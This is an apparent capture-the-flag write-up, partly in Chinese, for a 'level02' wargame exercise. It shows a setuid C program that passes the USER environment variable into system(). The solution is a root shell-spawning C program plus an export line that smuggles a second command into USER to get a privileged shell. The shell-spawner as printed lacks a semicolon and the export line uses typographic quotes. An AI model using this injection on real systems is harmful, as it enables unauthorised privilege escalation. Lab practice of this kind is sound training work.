There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02 . Files for this level can be found in /home/flag02.
#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <stdio.h> int main(int argc, char **argv, char **envp) { char *buffer; gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid); setresuid(uid, uid, uid); buffer = NULL; asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); printf("about to call system(\"%s\")\n", buffer); system(buffer); }
这个题目其实很简单,突破点就在于getenv("USER")
我们可以通过上一节的代码:
#include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/sh","sh",(char *)0) return 0; }
生成的可执行文件来完成这个练习。
export USER=“level02 && /tmp/test02”
这样运行可执行程序的时候就会返回一个flag02的shell,在上面运行getflag就可以打印出成功获取了权限。